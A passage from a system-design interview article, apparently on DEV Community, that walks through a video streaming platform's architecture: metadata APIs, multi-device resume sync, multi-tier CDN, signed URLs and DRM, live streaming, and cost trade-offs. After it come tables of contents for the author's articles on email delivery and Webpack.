Recommendation Engine:
- Feature Store: Collects user signals (watch time, skipped videos, likes).
- Ranking Service: A machine learning model that generates a list of videoIds for the user’s home feed.

5.3 Scalability Trade-offs

Decision	Choice	Why?
Video ID	UUID/Snowflake	Prevents ID predictable scraping and allows distributed generation.
Consistency	Eventual	A 1-second delay in "Like" count visibility is better than a system crash during a viral video.
Database Sharding	By VideoId	Ensures that metadata for a single viral video doesn't overwhelm a single DB node.

5.4 The API Handshake (Frontend Fetching)

The Frontend does not "join" tables. It calls a BFF (Backend-for-Frontend) or GraphQL Gateway:

GET /v1/video/:id returns a pre-aggregated JSON object containing video details, creator info, and the HLS manifest URL.
Prefetching Logic: When the user hovers over a thumbnail, the frontend pre-warps the Metadata Cache to make the actual click feel instant.

[ Metadata Flow ]

[ Client ] <---(GraphQL/REST)---> [ Metadata Service ]
                                         |
               +-------------------------+-------------------------+
               |                         |                         |
        [ PostgreSQL ]            [ Redis Cache ]           [ Elasticsearch ]
        (Users/Permissions)       (Hot Metadata)            (Video Search)

End of Chapter 5

Chapter 6 — State Management & Multi-Device Resume Sync

In a global platform, "State" exists in three places: the Local UI, the Video Player, and the Cloud. Maintaining a seamless "Continue Watching" experience requires a sophisticated synchronization strategy.

6.1 The State Hierarchy

Volatile State (UI): Search queries, hover states, menu toggles. Stored in React State / Signals.
Player State: Current playback timestamp, volume, selected quality. Stored in a specialized Player Controller.
Persistent State: Watch history, "Resume" points, User preferences. Stored in the Cloud.

6.2 The "Resume-Sync" Pipeline

How does Netflix know you stopped at 12:45 on your TV and show it on your phone instantly?

Client-Side Heartbeat: The Player Engine emits a "Pulse" event every 5-10 seconds.
Throttling & Batching: To avoid DDOSing the backend, the Frontend batches these pulses. We don't send an API call for every second played.
The Write-Ahead Log (WAL): The Backend receives the pulse and appends it to a high-speed log (Kafka).
The Sync Store: A high-availability Key-Value store (Redis/Cassandra) updates the last_watched_pos for the userId:videoId pair.

6.3 Handling Conflicts (The Edge Case)

If a user is watching on two devices simultaneously:

Conflict Resolution: We follow a Last-Write-Wins (LWW) or Max-Timestamp logic.
Race Conditions: If the user closes the app suddenly, we utilize the navigator.sendBeacon() API or a Service Worker to send a "Final Pulse" before the process is killed.

6.4 Local State Persistence (Offline Mode)

For the "Partial Offline Download" requirement:

IndexedDB: We store downloaded video segments and their metadata in the browser's IndexedDB.
Background Sync: When the user goes back online, a Service Worker triggers a background sync to upload any "Watch History" accumulated while offline.

6.5 State Management Architecture (ASCII)

[ Device A ]                                [ Device B ]
     |                                           |
(Heartbeat: 10s)                            (Fetch Resume)
     |                                           |
     v                                           v
[ API Gateway ] ───> [ Redis / Cassandra ] <── [ Metadata API ]
     |                  (Resume Store)
     +───> [ Kafka ] ───> [ Analytics DB ]

End of Chapter 6

Chapter 7 — Global Distribution & CDN Strategy

We recognize that the "Cloud" is too slow for video. To achieve a <500ms TTFF (Time to First Frame), we must move the data as close to the user's ISP as possible using a multi-tiered distribution strategy.

7.1 Multi-Tier CDN Architecture

We do not rely on a single origin. We use a layered approach:

Origin Server (S3): The source of truth for all transcoded segments.
Regional Edges: Larger caches that store 80% of popular content within a geographic region (e.g., US-East).
Local Edge (PoPs): Small, highly distributed servers inside local ISPs. These store the "Top 10%" viral videos to ensure zero-buffering for the most-watched content.

7.2 Cache Invalidation vs. Short TTLs

Video segments are Immutable. Once segment_101.ts is created, it never changes.

Strategy: We set an infinitely long TTL for video segments.
The Manifest Problem: Unlike segments, the Manifest (.m3u8) is dynamic (especially for Live). We use a short TTL (1-2s) for manifests or a Cache-Control: no-cache strategy to ensure the player always knows the latest state of the stream.

7.3 Geo-Routing & Request Steering

When a user hits "Play," the system must decide which CDN to use:

Anycast DNS: Routes the user to the nearest IP address.
Latency-Based Routing: The Backend Metadata API provides a manifest URL pointing to the CDN with the lowest current latency for that user's specific IP.

7.4 Content Steering (Fault Tolerance)

What if a major CDN provider (like Akamai or Cloudflare) goes down?

Client-Side Steering: The manifest contains URLs for multiple CDNs. If the Frontend Player detects a 5xx error or a timeout from CDN A, it automatically fails over to CDN B without stopping the video.

7.5 The "Hot" Video Problem (Thundering Herd)

When a viral video is released, millions of people request the same segment at the same millisecond.

Request Collapsing: The CDN Edge ensures that if 1,000 requests come in for the same segment, it only sends one request back to the origin, then broadcasts the result to all 1,000 users.

7.6 Distribution Architecture (ASCII)

[ Origin S3 ]
      |
      +-----> [ Regional Cache (London) ]
      |              |
      |              +-----> [ Local PoP (UK ISP) ] ---> [ Viewer A ]
      |              +-----> [ Local PoP (EU ISP) ] ---> [ Viewer B ]
      |
      +-----> [ Regional Cache (Mumbai) ]
                     |
                     +-----> [ Local PoP (India ISP) ] --> [ Viewer C ]

End of Chapter 7

Chapter 8 — Security, DRM Handshake & Access Control (Merged)

For a video platform, security is more than just an Auth token; it is an end-to-end chain of trust that protects billions of dollars in intellectual property while ensuring seamless user access.

8.1 The Access Control Handshake

We use a decoupled security model where the Backend defines the policy and the CDN enforces it.

Authentication: Users authenticate via OAuth2/OIDC. The frontend stores a short-lived JWT in a Secure; HttpOnly cookie.
Authorization: When a user clicks "Play," the Frontend requests a Signed URL or Cookie from the Backend.
CDN Enforcement: The CDN Edge validates the signature (HMAC) on the request. If the signature is expired or the IP doesn't match, the request is rejected at the edge, saving origin bandwidth.

8.2 Digital Rights Management (DRM)

To prevent stream ripping and unauthorized screen recording, we implement a DRM Handshake using the browser's EME (Encrypted Media Extensions).

The Components:
- CDM (Content Decryption Module): A sandbox in the browser/OS that handles decryption keys.
- License Server: A backend service that verifies the user's right to watch and issues a decryption key.
The Flow:
1. The Player detects encrypted segments in the manifest.
2. The Player sends a License Request (containing the device's hardware ID) to our License Server.
3. The Server returns an encrypted key.
4. The CDM decrypts the pixels directly in the GPU memory, ensuring the "Clear Text" video never touches the Javascript heap.

8.3 Protecting the API & Metadata

Rate Limiting: Using a Leaky Bucket algorithm at the API Gateway to prevent "View Count" manipulation and scraping.
CORS & CSRF: Strict Origin policies to ensure only our official web/mobile clients can initiate playback.
Geofencing: Backend checks the user's Geo-IP against the video's distribution rights before issuing a Signed URL.

8.4 Security Architecture (ASCII)

[ Browser / CDM ]          [ API Gateway ]          [ License Server ]
       |                          |                         |
(1) Get Signed URL -------------> | (Verify JWT & Rights)   |
       | <--- (Signed URL) -------|                         |
       |                          |                         |
(2) Request Segments (CDN)        |                         |
       |                          |                         |
(3) EME License Request ----------------------------------> |
       | <--- (Encrypted Key) ----------------------------- |
       |                          |                         |
(4) Decrypt & Render              |                         |

End of Chapter 8

Chapter 9 — Real-time Engagement & Live Streaming Deep-Dive

Live streaming is the "final boss" of video engineering. It requires shifting from a "pull-based" VOD model to a "push-based" real-time model where latency is measured in milliseconds, not seconds.

9.1 The Live Ingestion Pipeline

Unlike VOD, where we transcode the whole file, Live requires Streaming Transcoding.

Ingestion (RTMP/SRT): The creator's encoder (like OBS) pushes a continuous stream to our Live Ingest Service.
Transmuxing: The backend converts the incoming stream into tiny LL-HLS (Low-Latency HLS) or DASH chunks (typically 1-second segments).
The Live Edge: The CDN must be optimized to never cache the "Manifest" for more than a fraction of a second, ensuring users are always at the "Live Edge."

9.2 Real-time Engagement (Comments & Likes)

To handle viral moments (e.g., a sports final with 10M+ viewers), we cannot use standard polling.

WebSocket Gateways: Maintain persistent connections for the "Live Chat."
Pub/Sub (Kafka/Redis): When a comment is posted:
1. The Comment Service writes to a DB.
2. The event is published to a Redis Pub/Sub topic.
3. The WebSocket Gateway "fans out" the message to all connected viewers of that specific videoId.
Throttling & Sampled Likes: For massive streams, we don't show every single "Like" in real-time. We aggregate and sample at the edge to prevent the UI from becoming a resource hog.

9.3 DVR & Catch-up Capability

Systems allow users to "Rewind" a live stream.

Rolling Window: The CDN and Origin keep the last 2 hours of segments available.
Manifest Manipulation: The Frontend Player detects the EXT-X-PLAYLIST-TYPE:EVENT tag and allows the seek-bar to move backward into the cached segments while the stream continues at the edge.

9.4 Challenge: The "Herd" Effect

When the stream ends, 10 million people hit the "Home" button at once.

Solution: We use Staggered Reconnection and Jitter in our frontend retry logic to ensure that a massive audience doesn't crash the discovery services upon exit.

9.5 Live & Engagement Architecture (ASCII)

[ Creator ] --(RTMP)--> [ Ingest ] --+--> [ Transcoder ] --(HLS)--> [ CDN ]
                                     |
                                     +--> [ Frame Capture ] (Thumbnails)

[ Viewer ] <--(WS)--> [ Gateway ] <--(Pub/Sub)-- [ Engagement Service ]
    |                                                |
    +----(GET/POST)----------------------------------+

End of Chapter 9

Chapter 10 — Cost Model, Performance Trade-offs, and Final Architecture

In a interview, the final goal is to prove that the system is not just technically sound, but economically viable. This chapter explains the "Business Logic" of our architectural choices.

10.1 The Economic Model of Video

The biggest costs in this system are Bandwidth, CDN Egress, and Storage. Everything else (CPU for APIs, Database lookups) is negligible by comparison.

The "Thick Client" Strategy: By moving ABR logic and buffering to the frontend, we utilize the user's local CPU for free, rather than paying for server-side logic.
Storage Tiering: We use S3 Intelligent-Tiering. Raw videos move to "Glacier" (Cold) after 30 days, while transcoded fragments stay in "S3 Standard" (Hot) for CDN delivery.

10.2 Performance Trade-offs (Decisions)

Decision	Choice	The Trade-off
Consistency	Eventual	We sacrifice perfect counters (Likes/Views) for absolute availability of playback.
Latency	Buffering	We intentionally delay playback start by 2-3 segments to ensure a "Stall-free" experience.
Resolution	Transcoding	We spend money upfront on transcoding to save money on bandwidth later (by serving smaller files).

10.3 Summary of the "Sweet Spot" Architecture

This design succeeds because it separates concerns into three distinct layers:

The Client (Spine): Controls reality. It handles the network's unpredictability and manages the hardware resources.
The Edge (CDN): Controls scale. It brings the bits to the user's doorstep, bypassing the slow public internet.
The Backend (Foundation): Controls policy. It handles metadata, security keys, and the heavy lifting of transcoding.

10.4 Final Conclusion for the Interview

"We have built a system that is Offline-First, Global by Design, and Economically Optimized. By leveraging a metadata-driven ingestion pipeline and a sophisticated client-side player engine, we ensure that the platform remains performant for the next 100M users, regardless of their device or network speed."

📄 Document Audit Checklist

[x] Ingestion: Resumable, chunked, and multi-bitrate.
[x] Playback: ABR, MSE/EME, and Frame-accurate seeking.
[x] Discovery: Decoupled metadata DB with search indexing.
[x] Scale: Multi-tier CDN and Edge-caching.
[x] Security: Signed URLs and DRM Handshake.
[x] Consistency: Eventual consistency for engagement; Strong for auth.

End of Chapter 10.

Chapter 11 — The End-to-End Playback Lifecycle: A Narrative Walkthrough

To tie the previous 10 chapters together, we will trace the journey of a single user (Alice) watching a single video (4K "Nature Documentary") from the moment she hits "Play" to the moment she switches devices.

11.1 Phase 1: The Handshake (Chapters 5 & 8)

Action: Alice clicks the "Play" button on her React-based Discovery Feed.
The Logic: 1. The Frontend calls the Discovery API (Chapter 5) to fetch video metadata. 2. Simultaneously, the Security Service (Chapter 8) issues a Signed Manifest URL and a DRM License Challenge. 3. The browser receives a JSON response containing the Master Manifest URL (.m3u8).

11.2 Phase 2: Orchestration & ABR (Chapter 4)

Action: The Player Controller (Chapter 4) takes over.
The Logic:
1. The player downloads the Master Manifest.
2. The ABR Logic Unit (Chapter 4) detects Alice is on a 50Mbps connection and chooses the 4K variant.
3. The Segment Downloader maps the 4K variant to a specific CDN Edge location (Chapter 7).

11.3 Phase 3: The Data Flow (Chapter 3 & 7)

Action: Pixels move from the Edge to the Screen.
The Logic:
1. The browser requests segment_001.ts from the CDN.
2. The CDN Edge (Chapter 7) serves the file from its SSD cache (originally generated by the Transcoder in Chapter 3).
3. The binary data is fed into the Media Source Extensions (MSE) buffer (Chapter 4).
4. The CDM/DRM Module (Chapter 8) decrypts the data in the hardware, and Alice sees the first frame.

11.4 Phase 4: Reality Reporting (Chapter 6 & 9)

Action: The system "remembers" Alice’s experience.
The Logic:
1. Every 10 seconds, the Frontend emits a Heartbeat (Chapter 6).
2. This pulse updates the Resume Store (Chapter 6) so Alice can switch to her iPad later.
3. High-volume signals like "Likes" or "Real-time Views" flow through Kafka to update the global counters (Chapter 9).

11.5 Phase 5: The Handover

Action: Alice closes her laptop and opens her phone.
The Logic:
1. The Phone app calls the Metadata API.
2. It receives the last_watched_pos from the Resume Store.
3. The Player Engine seeks to 12:45, and the cycle repeats instantly.

Summary: The Core Invariant

This narrative proves that our architecture is not just a list of services, but a synchronized loop.

The Backend defines what can be watched.
The CDN handles the weight of the bits.
The Frontend owns the decision-making logic.

End of Chapter 11.

DEV Community: Arghya Majumder

Email Delivery System — Gmail / Outlook

Email Delivery System — Gmail / Outlook

1. Problem + Scope

2. Assumptions & Scale

3. Functional Requirements

4. Non-Functional Requirements

🧠 Mental Model

5. API Design

6. End-to-End Flow

6.1 Send Email — Quick Reference (speak this out loud in the interview)

6.2 Send Email (Internal — Gmail to Gmail, Sequence Diagram)

6.3 Send Email (External — Gmail to Outlook, Sequence Diagram)

6.4 Receive Email (External — Outlook to Gmail, Sequence Diagram)

7. High-Level Architecture

Simple Design

Evolved Design (Full Pipeline)

8. Data Model

9. Deep Dives

9.1 Transactional Outbox Pattern — Zero Email Loss

9.2 Async Parallel Validation Pipeline

9.3 SMTP Cross-Domain Delivery — 15-Step Handshake

9.4 Spam Filtering Design

9.5 Rate Limiting and Abuse Protection

9.6 User Registration — Uniqueness at 1.5B Scale

10. Bottlenecks & Scaling

11. Failure Scenarios

12. Trade-offs

Cassandra vs PostgreSQL for Mailbox

Sync vs Async Delivery Pipeline

Pre-scan Attachments vs Scan at Send Time

Frontend Notes (10% of design)

Interview Summary

Key Decisions

Fast Path vs Reliable Path

Key Insights Checklist

Webpack

What is Webpack?

Why Do We Need It?

The Real Root Problem: Browsers Have No Module System

Core Concepts

1. Entry

2. Output

3. Loaders

4. Plugins

5. Mode

How Webpack Works — Internally

Chunks & Code Splitting

Types of Chunks

Why Code Splitting?

Dynamic Import (lazy loading)

SplitChunksPlugin (vendor splitting)

Styles

1. style-loader + css-loader (development)

2. MiniCssExtractPlugin (production)

3. CSS Modules

Tree Shaking

Module Federation

Key concepts

Example

The Global Scope Trick — How Module Federation Actually Works

Passing Data: Host → Remote (Module Federation)

Strategy 1 — Props (simplest, most natural)

Strategy 2 — Exposed API / Hook (remote → host)

Strategy 3 — Shared Store (Redux / Zustand via shared modules)

Strategy 4 — Custom Events (decoupled, cross-framework)

Strategy 5 — Shared Context (React-specific, elegant)

Which Pattern When?

Content Hashing & Caching

HMR — Hot Module Replacement

Other Important Concepts

resolve.alias — Path Shortcuts

publicPath — Where Assets Are Served From

devServer — Local Development

Source Maps — Debugging Minified Code

Environment Variables

Webpack 5 Persistent Cache

Asset Modules (Webpack 5) — No More url-loader / file-loader

Webpack vs Alternatives

Interview Summary

`resolve.alias` — Path Shortcuts

`publicPath` — Where Assets Are Served From

`devServer` — Local Development